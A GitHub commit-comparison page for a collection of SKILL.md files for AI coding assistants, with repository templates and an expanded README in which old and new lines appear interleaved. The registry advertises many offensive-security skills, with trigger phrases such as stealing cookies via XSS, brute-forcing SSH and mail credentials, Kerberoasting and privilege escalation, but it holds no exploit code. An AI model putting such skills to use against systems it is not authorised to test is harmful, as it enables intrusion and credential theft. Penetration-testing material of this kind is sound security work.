Compare commits

26 Commits

| Author | SHA1 | Date |
| --- | --- | --- |
| | b5675d55ce | |
| | 6dcb7973ad | |
| | 9850b6b8e7 | |
| | 46d575b8d0 | |
| | 02fab354e0 | |
| | 226a7596cb | |
| | 11c16dbe27 | |
| | 95eeb1dd4b | |
| | b1e4d61715 | |
| | d17e7bc767 | |
| | 450a8a95a5 | |
| | 7a14904fd3 | |
| | 59a349075e | |
| | d8b9ac19b2 | |
| | 68a457b96b | |
| | 98756d75ae | |
| | 4ee569d5d5 | |
| | 8a4b4383e8 | |
| | 9d09626fd2 | |
| | 014da3e744 | |
| | 113bc99e47 | |
| | 3e46a495c9 | |
| | faf478f389 | |
| | 266cbf4c6c | |
| | f8eaf7bd50 | |
| | 4dcd96e484 | |
8  .github/CODEOWNERS  vendored  Normal file

@@ -0,0 +1,8 @@
# Global owners
* @sickn33

# Skills
/skills/ @sickn33

# Documentation
*.md @sickn33
33  .github/ISSUE_TEMPLATE/bug_report.md  vendored  Normal file

@@ -0,0 +1,33 @@
---
name: Bug Report
about: Create a report to help us improve the skills
title: "[BUG] "
labels: bug
assignees: sickn33
---

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:

1. Go to '...'
2. Click on '...'
3. Scroll down to '...'
4. See error

**Expected behavior**
A clear and concise description of what you expected to happen.

**Screenshots**
If applicable, add screenshots to help explain your problem.

**Environment (please complete the following information):**

- OS: [e.g. macOS, Windows]
- Tool: [e.g. Claude Code, Antigravity]
- Version [if known]

**Additional context**
Add any other context about the problem here.
19  .github/ISSUE_TEMPLATE/feature_request.md  vendored  Normal file

@@ -0,0 +1,19 @@
---
name: Skill Request
about: Suggest a new skill for the collection
title: "[REQ] "
labels: enhancement
assignees: sickn33
---

**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex: I'm always frustrated when [...]

**Describe the solution you'd like**
A description of the skill you want. What trigger should it have? What files should it affect?

**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.

**Additional context**
Add any other context or screenshots about the feature request here.
18  .github/PULL_REQUEST_TEMPLATE.md  vendored  Normal file

@@ -0,0 +1,18 @@
## Description

Please describe your changes. What skill are you adding or modifying?

## Checklist

- [ ] My skill follows the [creation guidelines](https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/skill-creator)
- [ ] I have run `validate_skills.py`
- [ ] I have added my name to the credits (if applicable)

## Type of Change

- [ ] New Skill
- [ ] Bug Fix
- [ ] Documentation Update
- [ ] Infrastructure

## Screenshots (if applicable)
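The checklist's validation step can be approximated locally. This is only a sketch of what a SKILL.md check might do; the real `validate_skills.py` ships in the repo and may check more, and `demo-skill` here is a made-up example so the snippet is self-contained:

```shell
# demo-skill is a made-up example so this sketch is self-contained.
mkdir -p skills/demo-skill
printf -- '---\nname: demo-skill\ndescription: An example skill.\n---\n' > skills/demo-skill/SKILL.md

# Approximate check: every skill folder must ship a SKILL.md opening with
# a YAML front-matter delimiter. The real validate_skills.py may do more.
for d in skills/*/; do
  if [ -f "${d}SKILL.md" ] && head -n 1 "${d}SKILL.md" | grep -q '^---$'; then
    echo "OK: ${d}"
  else
    echo "FAIL: ${d}"
  fi
done
```

Running the real script from the repo root before opening a PR is still the authoritative step.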
6  .gitignore  vendored  Normal file

@@ -0,0 +1,6 @@

MAINTENANCE.md
walkthrough.md
.agent/rules/
.gemini/
LOCAL_CONFIG.md
256  README.md

@@ -1,23 +1,60 @@
# 🌌 Antigravity Awesome Skills
# 🌌 Antigravity Awesome Skills: 133+ Agentic Skills for Claude Code, Gemini CLI, Cursor, Copilot & More

> **The Ultimate Collection of 60+ Agentic Skills for Claude Code (Antigravity)**
> **The Ultimate Collection of 133+ Universal Agentic Skills for AI Coding Assistants — Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode**

[](https://opensource.org/licenses/MIT)
[](https://claude.ai)
[](https://github.com/guanyang/antigravity-skills)
[](https://claude.ai)
[](https://github.com/google-gemini/gemini-cli)
[](https://github.com/openai/codex)
[](https://cursor.sh)
[](https://github.com/features/copilot)
[](https://github.com/opencode-ai/opencode)
[](https://github.com/anthropics/antigravity)

**Antigravity Awesome Skills** is a curated, battle-tested collection of **62 high-performance skills** compatible with both **Antigravity** and **Claude Code**, including official skills from **Anthropic** and **Vercel Labs**.
**Antigravity Awesome Skills** is a curated, battle-tested library of **133 high-performance agentic skills** designed to work seamlessly across all major AI coding assistants:

- 🟣 **Claude Code** (Anthropic CLI)
- 🔵 **Gemini CLI** (Google DeepMind)
- 🟢 **Codex CLI** (OpenAI)
- 🔴 **Antigravity IDE** (Google DeepMind)
- 🩵 **GitHub Copilot** (VSCode Extension)
- 🟠 **Cursor** (AI-native IDE)
- ⚪ **OpenCode** (Open-source CLI)

This repository provides essential skills to transform your AI assistant into a **full-stack digital agency**, including official capabilities from **Anthropic**, **OpenAI**, **Google**, and **Vercel Labs**.

## 📍 Table of Contents

- [🔌 Compatibility](#-compatibility)
- [Features & Categories](#features--categories)
- [Full Skill Registry](#full-skill-registry-6262)
- [Full Skill Registry](#full-skill-registry-133133)
- [Installation](#installation)
- [How to Contribute](#how-to-contribute)
- [Credits & Sources](#credits--sources)
- [License](#license)

Whether you are using the Google DeepMind Antigravity framework or the standard Anthropic Claude Code CLI, these skills are designed to drop right in and supercharge your agent.
---

## 🔌 Compatibility

These skills follow the universal **SKILL.md** format and work with any AI coding assistant that supports agentic skills:

| Tool | Type | Compatibility | Installation Path |
| --- | --- | --- | --- |
| **Claude Code** | CLI | ✅ Full | `.claude/skills/` or `.agent/skills/` |
| **Gemini CLI** | CLI | ✅ Full | `.gemini/skills/` or `.agent/skills/` |
| **Codex CLI** | CLI | ✅ Full | `.codex/skills/` or `.agent/skills/` |
| **Antigravity IDE** | IDE | ✅ Full | `.agent/skills/` |
| **Cursor** | IDE | ✅ Full | `.cursor/skills/` or project root |
| **GitHub Copilot** | Extension | ⚠️ Partial | Copy skill content to `.github/copilot/` |
| **OpenCode** | CLI | ✅ Full | `.opencode/skills/` or `.agent/skills/` |

> [!TIP]
> Most tools auto-discover skills in `.agent/skills/`. For maximum compatibility, clone to this directory.
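Following the compatibility table and tip above, wiring a skill into the auto-discovery path might look like this. The `REPO` path and the stand-in `mkdir` are assumptions so the sketch runs on its own; in practice you would clone the repository there first:

```shell
# Sketch: wire one skill from a local checkout into the auto-discovery path.
# REPO is an assumption; point it at wherever you cloned the collection.
REPO="${REPO:-$PWD/antigravity-awesome-skills}"
# Stand-in for a real clone so this sketch is self-contained:
mkdir -p "$REPO/skills/systematic-debugging"
touch "$REPO/skills/systematic-debugging/SKILL.md"

# The actual install step: copy (or symlink) the skill into .agent/skills/.
mkdir -p .agent/skills
cp -r "$REPO/skills/systematic-debugging" .agent/skills/
ls .agent/skills/
```

A symlink instead of `cp -r` keeps the installed skill in sync with the checkout, at the cost of tools that do not follow links.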
---

Whether you are using **Gemini CLI**, **Claude Code**, **Codex CLI**, **Cursor**, **GitHub Copilot**, **Antigravity**, or **OpenCode**, these skills are designed to drop right in and supercharge your AI agent.

This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.
@@ -25,66 +62,128 @@ This repository aggregates the best capabilities from across the open-source com

The repository is organized into several key areas of expertise:

| Category | Skills Included |
| :--- | :--- |
| **🎨 Creative & Design** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz |
| **🛠️ Development** | TDD, Systematic Debugging, Webapp Testing, Backend/Frontend Guidelines, React Patterns |
| **🛡️ Cybersecurity** | Ethical Hacking, AWS Pentesting, OWASP Top 100, Pentest Checklists |
| **🛸 Autonomous** | **Loki Mode** (Startup-in-a-box), Subagent Orchestration, Parallel Execution |
| **📈 Strategy** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming |
| **🏗️ Infrastructure** | Linux Shell Scripting, Git Worktrees, Conventional Commits, File Organization |
| Category | Skills Count | Key Skills Included |
| :--- | :--- | :--- |
| **🛡️ Cybersecurity** | **~50** | Ethical Hacking, Metasploit, Burp Suite, SQLMap, Active Directory, AWS/Cloud Pentesting, OWASP Top 100, Red Team Tools |
| **🛠️ Development** | **~25** | TDD, Systematic Debugging, React Patterns, Backend/Frontend Guidelines, Senior Fullstack, Software Architecture |
| **🎨 Creative & Design** | **~10** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz, Web Artifacts |
| **🤖 AI & LLM Development** | **~8** | LLM App Patterns, Autonomous Agent Patterns, Prompt Engineering, Prompt Library, JavaScript Mastery, Bun Development |
| **🛸 Autonomous & Agentic** | **~8** | Loki Mode (Startup-in-a-box), Subagent Driven Dev, Dispatching Parallel Agents, Planning With Files, Skill Creator/Developer |
| **📄 Document Processing** | **~4** | DOCX (Official), PDF (Official), PPTX (Official), XLSX (Official) |
| **📈 Product & Strategy** | **~8** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming, Internal Comms |
| **🏗️ Infrastructure & Git** | **~8** | Linux Shell Scripting, Git Worktrees, Git Pushing, Conventional Commits, File Organization, GitHub Workflow Automation |
| **🔄 Workflow & Planning** | **~6** | Writing Plans, Executing Plans, Concise Planning, Verification Before Completion, Code Review (Requesting/Receiving) |
| **🧪 Testing & QA** | **~4** | Webapp Testing, Playwright Automation, Test Fixing, Testing Patterns |

---
## Full Skill Registry (62/62)
## Full Skill Registry (133/133)

Below is the complete list of available skills. Each skill folder contains a `SKILL.md` that can be imported into Antigravity or Claude Code.

> [!NOTE]
> **Document Skills**: We provide both **community** and **official Anthropic** versions for DOCX, PDF, PPTX, and XLSX. Locally, the official versions are used by default (via symlinks). In the repository, both versions are available for flexibility.

| Skill Name | Description | Path |
| :--- | :--- | :--- |
| **Algorithmic Art** | Creative generative art using p5.js and seeded randomness. | `skills/algorithmic-art` |
| **App Store Optimization** | Complete ASO toolkit for iOS and Android app performance. | `skills/app-store-optimization` |
| **AWS Pentesting** | Specialized security assessment for Amazon Web Services. | `skills/aws-penetration-testing` |
| **Backend Guidelines** | Core architecture patterns for Node/Express microservices. | `skills/backend-dev-guidelines` |
| **Brainstorming** | Requirement discovery and intent exploration framework. | `skills/brainstorming` |
| **Brand Guidelines (Anthropic)** | Official Anthropic brand styling and visual standards. | `skills/brand-guidelines-anthropic` ⭐ NEW |
| **Brand Guidelines (Community)** | Community-contributed brand guidelines and templates. | `skills/brand-guidelines-community` |
| **Canvas Design** | Beautiful static visual design in PDF and PNG. | `skills/canvas-design` |
| **Claude D3.js** | Advanced data visualization with D3.js. | `skills/claude-d3js-skill` |
| **Content Creator** | SEO-optimized marketing and brand voice toolkit. | `skills/content-creator` |
| **Core Components** | Design system tokens and baseline UI patterns. | `skills/core-components` |
| **Doc Co-authoring** | Structured workflow for technical documentation. | `skills/doc-coauthoring` |
| **DOCX (Official)** | Official Anthropic MS Word document manipulation. | `skills/docx-official` ⭐ NEW |
| **Ethical Hacking** | Comprehensive penetration testing lifecycle methodology. | `skills/ethical-hacking-methodology` |
| **Frontend Design** | Production-grade UI component implementation. | `skills/frontend-design` |
| **Frontend Guidelines** | Modern React/TS development patterns and file structure. | `skills/frontend-dev-guidelines` |
| **Git Pushing** | Automated staging and conventional commits. | `skills/git-pushing` |
| **Internal Comms (Anthropic)** | Official Anthropic corporate communication templates. | `skills/internal-comms-anthropic` ⭐ NEW |
| **Internal Comms (Community)** | Community-contributed communication templates. | `skills/internal-comms-community` |
| **Kaizen** | Continuous improvement and error-proofing (Poka-Yoke). | `skills/kaizen` |
| **Linux Shell Scripting** | Production-ready shell scripts for automation. | `skills/linux-shell-scripting` |
| **Loki Mode** | Fully autonomous startup development engine. | `skills/loki-mode` |
| **MCP Builder** | High-quality Model Context Protocol (MCP) server creation. | `skills/mcp-builder` |
| **NotebookLM** | Source-grounded querying via Google NotebookLM. | `skills/notebooklm` |
| **PDF (Official)** | Official Anthropic PDF document manipulation. | `skills/pdf-official` ⭐ NEW |
| **Pentest Checklist** | Structured security assessment planning and scoping. | `skills/pentest-checklist` |
| **PPTX (Official)** | Official Anthropic PowerPoint manipulation. | `skills/pptx-official` ⭐ NEW |
| **Product Toolkit** | RICE prioritization and product discovery frameworks. | `skills/product-manager-toolkit` |
| **Prompt Engineering** | Expert patterns for LLM instruction optimization. | `skills/prompt-engineering` |
| **React Best Practices** | Vercel's 40+ performance optimization rules for React. | `skills/react-best-practices` ⭐ NEW (Vercel) |
| **React UI Patterns** | Standardized loading states and error handling for React. | `skills/react-ui-patterns` |
| **Senior Architect** | Scalable system design and architecture diagrams. | `skills/senior-architect` |
| **Skill Creator** | Meta-skill for building high-performance agentic skills. | `skills/skill-creator` |
| **Software Architecture** | Quality-focused design principles and analysis. | `skills/software-architecture` |
| **Systematic Debugging** | Root cause analysis and structured fix verification. | `skills/systematic-debugging` |
| **TDD** | Test-Driven Development workflow and red-green-refactor. | `skills/test-driven-development` |
| **UI/UX Pro Max** | Advanced design intelligence and 50+ styling options. | `skills/ui-ux-pro-max` |
| **Web Artifacts** | Complex React/Tailwind/Shadcn UI artifact builder. | `skills/web-artifacts-builder` |
| **Web Design Guidelines** | Vercel's 100+ UI/UX audit rules (accessibility, performance). | `skills/web-design-guidelines` ⭐ NEW (Vercel) |
| **Webapp Testing** | Local web application testing with Playwright. | `skills/webapp-testing` |
| **XLSX (Official)** | Official Anthropic Excel spreadsheet manipulation. | `skills/xlsx-official` ⭐ NEW |

| Skill Name | Description | Path |
| :--- | :--- | :--- |
| **API Fuzzing for Bug Bounty** | This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. | `skills/api-fuzzing-bug-bounty` |
| **AWS Penetration Testing** | This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment. | `skills/aws-penetration-testing` |
| **Active Directory Attacks** | This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. | `skills/active-directory-attacks` |
| **Address GitHub Comments** | Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI. | `skills/address-github-comments` |
| **Agent Manager Skill** | Use when you need to manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling. | `skills/agent-manager-skill` |
| **Algorithmic Art** | Creating algorithmic art using p5.js. | `skills/algorithmic-art` |
| **App Store Optimization** | Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store. | `skills/app-store-optimization` |
| **Autonomous Agent Patterns** | Design patterns for building autonomous coding agents. | `skills/autonomous-agent-patterns` |
| **Backend Guidelines** | Comprehensive backend development guide for Node.js. | `skills/backend-dev-guidelines` |
| **Brainstorming** | You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. | `skills/brainstorming` |
| **BlockRun** | Agent wallet for LLM micropayments. Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek"). | `skills/blockrun` |
| **Brand Guidelines (Anthropic)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-anthropic` |
| **Brand Guidelines (Community)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-community` |
| **Broken Authentication Testing** | This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". | `skills/broken-authentication` |
| **Bun Development** | Modern JavaScript/TypeScript development with Bun runtime. | `skills/bun-development` |
| **Burp Suite Web Application Testing** | This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". | `skills/burp-suite-testing` |
| **Canvas Design** | Create beautiful visual art in PDF and PNG. | `skills/canvas-design` |
| **Claude Code Guide** | Master guide for using Claude Code effectively. | `skills/claude-code-guide` |
| **Claude D3.js** | Creating interactive data visualisations using d3.js. | `skills/claude-d3js-skill` |
| **Cloud Penetration Testing** | This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". | `skills/cloud-penetration-testing` |
| **Concise Planning** | Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist. | `skills/concise-planning` |
| **Content Creator** | Create SEO-optimized marketing content with consistent brand voice. | `skills/content-creator` |
| **Core Components** | Core component library and design system patterns. | `skills/core-components` |
| **Cross-Site Scripting and HTML Injection Testing** | This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". | `skills/xss-html-injection` |
| **Dispatching Parallel Agents** | Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies. | `skills/dispatching-parallel-agents` |
| **Doc Co-authoring** | Guide users through a structured workflow for co-authoring documentation. | `skills/doc-coauthoring` |
| **DOCX (Official)** | Comprehensive document creation, editing, and analysis with support for tracked changes, comments, formatting preservation, and text extraction. | `skills/docx-official` |
| **Ethical Hacking Methodology** | This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". | `skills/ethical-hacking-methodology` |
| **Executing Plans** | Use when you have a written implementation plan to execute in a separate session with review checkpoints. | `skills/executing-plans` |
| **File Organizer** | Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. | `skills/file-organizer` |
| **File Path Traversal Testing** | This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". | `skills/file-path-traversal` |
| **Finishing Dev Branch** | Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup. | `skills/finishing-a-development-branch` |
| **Frontend Design** | Create distinctive, production-grade frontend interfaces with high design quality. | `skills/frontend-design` |
| **Frontend Guidelines** | Frontend development guidelines for React/TypeScript applications. | `skills/frontend-dev-guidelines` |
| **Git Pushing** | Stage, commit, and push git changes with conventional commit messages. | `skills/git-pushing` |
| **GitHub Workflow Automation** | Automate GitHub workflows with AI assistance. | `skills/github-workflow-automation` |
| **HTML Injection Testing** | This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". | `skills/html-injection-testing` |
| **IDOR Vulnerability Testing** | This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." | `skills/idor-testing` |
| **Internal Comms (Anthropic)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-anthropic` |
| **Internal Comms (Community)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-community` |
| **JavaScript Mastery** | Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. | `skills/javascript-mastery` |
| **Kaizen** | Guide for continuous improvement, error proofing, and standardization. | `skills/kaizen` |
| **Linux Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". | `skills/linux-privilege-escalation` |
| **Linux Shell Scripting** | This skill should be used when the user asks to "create bash scripts", "automate Linux tasks", "monitor system resources", "backup files", "manage users", or "write production shell scripts". | `skills/linux-shell-scripting` |
| **LLM App Patterns** | Production-ready patterns for building LLM applications. | `skills/llm-app-patterns` |
| **Loki Mode** | Multi-agent autonomous startup system for Claude Code. | `skills/loki-mode` |
| **MCP Builder** | Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. | `skills/mcp-builder` |
| **Metasploit Framework** | This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". | `skills/metasploit-framework` |
| **Network 101** | This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs. | `skills/network-101` |
| **NotebookLM** | Use this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. | `skills/notebooklm` |
| **PDF (Official)** | Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. | `skills/pdf-official` |
| **Pentest Checklist** | This skill should be used when the user asks to "plan a penetration test", "create a security assessment checklist", "prepare for penetration testing", "define pentest scope", "follow security testing best practices", or needs a structured methodology for penetration testing engagements. | `skills/pentest-checklist` |
| **Pentest Commands** | This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references. | `skills/pentest-commands` |
| **Planning With Files** | Implements Manus-style file-based planning for complex tasks. | `skills/planning-with-files` |
| **Playwright Automation** | Complete browser automation with Playwright. | `skills/playwright-skill` |
| **PPTX (Official)** | Presentation creation, editing, and analysis. | `skills/pptx-official` |
| **Privilege Escalation Methods** | This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems. | `skills/privilege-escalation-methods` |
| **Product Toolkit** | Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. | `skills/product-manager-toolkit` |
| **Prompt Engineering** | Expert guide on prompt engineering patterns, best practices, and optimization techniques. | `skills/prompt-engineering` |
| **Prompt Library** | Curated collection of high-quality prompts for various use cases. | `skills/prompt-library` |
| **React Best Practices** | React and Next.js best practices. | `skills/react-best-practices` |
| **React UI Patterns** | Modern React UI patterns for loading states, error handling, and data fetching. | `skills/react-ui-patterns` |
| **Receiving Code Review** | Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performative agreement or blind implementation. | `skills/receiving-code-review` |
| **Red Team Tools and Methodology** | This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters. | `skills/red-team-tools` |
| **Requesting Code Review** | Use when completing tasks, implementing major features, or before merging to verify work meets requirements. | `skills/requesting-code-review` |
| **SMTP Penetration Testing** | This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". | `skills/smtp-penetration-testing` |
| **SQL Injection Testing** | This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". | `skills/sql-injection-testing` |
| **SQLMap Database Penetration Testing** | This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." | `skills/sqlmap-database-pentesting` |
| **SSH Penetration Testing** | This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". | `skills/ssh-penetration-testing` |
| **Security Scanning Tools** | This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". | `skills/scanning-tools` |
| **Senior Architect** | Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. | `skills/senior-architect` |
| **Senior Fullstack** | Comprehensive fullstack development skill for building complete web applications with React, Next.js. | `skills/senior-fullstack` |
| **Shodan Reconnaissance and Pentesting** | This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports." | `skills/shodan-reconnaissance` |
| **Shopify Development** | Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid. Use when user asks about "shopify app", "checkout extension", "shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook", or "metafields". | `skills/shopify-development` |
| **Skill Creator** | Guide for creating effective skills. | `skills/skill-creator` |
| **Skill Developer** | Create and manage Claude Code skills following Anthropic best practices. | `skills/skill-developer` |
| **Slack GIF Creator** | Knowledge and utilities for creating animated GIFs optimized for Slack. | `skills/slack-gif-creator` |
| **Software Architecture** | Guide for quality-focused software architecture. | `skills/software-architecture` |
| **Subagent Driven Dev** | Use when executing implementation plans with independent tasks in the current session. | `skills/subagent-driven-development` |
| **Systematic Debugging** | Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes. | `skills/systematic-debugging` |
| **TDD** | Use when implementing any feature or bugfix, before writing implementation code. | `skills/test-driven-development` |
|
||||
| **Test Fixing** | Run tests and systematically fix all failing tests using smart error grouping. | `skills/test-fixing` |
|
||||
| **Testing Patterns** | Jest testing patterns, factory functions, mocking strategies, and TDD workflow. | `skills/testing-patterns` |
|
||||
| **Theme Factory** | Toolkit for styling artifacts with a theme. | `skills/theme-factory` |
|
||||
| **Top 100 Vulnerabilities** | This skill should be used when the user asks to "identify web application vulnerabilities", "explain common security flaws", "understand vulnerability categories", "learn about injection attacks", "review access control weaknesses", "analyze API security issues", "assess security misconfigurations", "understand client-side vulnerabilities", "examine mobile and IoT security flaws", or "reference the OWASP-aligned vulnerability taxonomy". | `skills/top-web-vulnerabilities` |
|
||||
| **UI/UX Pro Max** | "UI/UX design intelligence. | `skills/ui-ux-pro-max` |
|
||||
| **Using Git Worktrees** | Use when starting feature work that needs isolation from current workspace or before executing implementation plans - creates isolated git worktrees with smart directory selection and safety verification. | `skills/using-git-worktrees` |
|
||||
| **Using Superpowers** | Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response including clarifying questions. | `skills/using-superpowers` |
|
||||
| **Verification Before Completion** | Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always. | `skills/verification-before-completion` |
|
||||
| **Web Artifacts** | Suite of tools for creating elaborate, multi-component claude. | `skills/web-artifacts-builder` |
|
||||
| **Web Design Guidelines** | Review UI code for Web Interface Guidelines compliance. | `skills/web-design-guidelines` |
|
||||
| **Webapp Testing** | Toolkit for interacting with and testing local web applications using Playwright. | `skills/webapp-testing` |
|
||||
| **Windows Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation. | `skills/windows-privilege-escalation` |
|
||||
| **Wireshark Network Traffic Analysis** | This skill should be used when the user asks to "analyze network traffic with Wireshark", "capture packets for troubleshooting", "filter PCAP files", "follow TCP/UDP streams", "detect network anomalies", "investigate suspicious traffic", or "perform protocol analysis". | `skills/wireshark-analysis` |
|
||||
| **Workflow Automation** | "Design and implement automated workflows combining visual logic with custom code. | `skills/workflow-automation` |
|
||||
| **WordPress Penetration Testing** | This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". | `skills/wordpress-penetration-testing` |
|
||||
| **Writing Plans** | Use when you have a spec or requirements for a multi-step task, before touching code. | `skills/writing-plans` |
|
||||
| **Writing Skills** | Use when creating new skills, editing existing skills, or verifying skills work before deployment. | `skills/writing-skills` |
|
||||
| **XLSX (Official)** | "Comprehensive spreadsheet creation, editing, and analysis with support for formulas, formatting, data analysis, and visualization. | `skills/xlsx-official` |
|
||||
|
||||
> [!TIP]
|
||||
> Use the `validate_skills.py` script in the `scripts/` directory to ensure all skills are properly formatted and ready for use.
|
||||
@@ -93,10 +192,20 @@ Below is the complete list of available skills. Each skill folder contains a `SK

## Installation

To use these skills with **Antigravity** or **Claude Code**, clone this repository into your agent's skills directory:
To use these skills with **Claude Code**, **Gemini CLI**, **Codex CLI**, **Cursor**, **Antigravity**, or **OpenCode**, clone this repository into your agent's skills directory:

```bash
# Universal installation (works with most tools)
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills

# Claude Code specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .claude/skills

# Gemini CLI specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .gemini/skills

# Cursor specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .cursor/skills
```

---
@@ -122,7 +231,9 @@ This collection would not be possible without the incredible work of the Claude

### Official Sources

- **[anthropics/skills](https://github.com/anthropics/skills)**: Official Anthropic skills repository - Document manipulation (DOCX, PDF, PPTX, XLSX), Brand Guidelines, Internal Communications.
